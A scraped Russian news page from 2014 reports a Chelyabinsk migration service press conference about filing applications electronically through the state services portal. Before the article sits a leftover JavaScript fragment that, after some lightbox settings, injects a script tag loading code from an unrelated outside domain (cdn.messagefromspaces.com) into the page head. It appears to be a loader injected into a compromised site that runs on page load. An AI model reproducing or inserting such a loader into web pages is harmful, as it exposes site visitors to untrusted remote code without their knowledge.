, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Челябинске сотрудники миграционной службы рассказали о преимуществах подачи заявлений в электронном виде

Сегодня, 1 апреля,  в редакции газеты «Аргументы и Факты-Челябинск» сотрудники Управления ФМС России по Челябинской области провели пресс-конференцию для представителей средств массовой информации. Основной темой встречи с представителями СМИ стали услуги, оказываемые миграционной службой в электронном виде - посредством портала Государственных и муниципальных услуг.

Об истории создания портала и его основных функциях  рассказала заместитель начальника УФМС России по Челябинской области Светлана Сенникова. На вопросы журналистов о технических моментах, связанных с заполнением и отправкой заявлений в электронном виде, ответил специалист отдела информационного обеспечения УФМС области Антон Мелентьев.

Сотрудники УФМС еще раз поведали обо всех преимуществах подачи документов в электронном виде через портал Госуслуг. В ходе пресс-конференции в очередной раз было подчеркнуто, что УФМС России по Челябинской области оказывает государственные услуги в электронном виде не только по оформлению заграничных паспортов, но и по другим направлениям служебной деятельности. На пресс-конференции присутствовали представители более чем 13-ти средств массовой информации города.

 

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
16:39 - 01 апреля 2014
|
автор: U-RSS
|
(481)
|
(0)

Комментарии (0)

Я человек
Я бот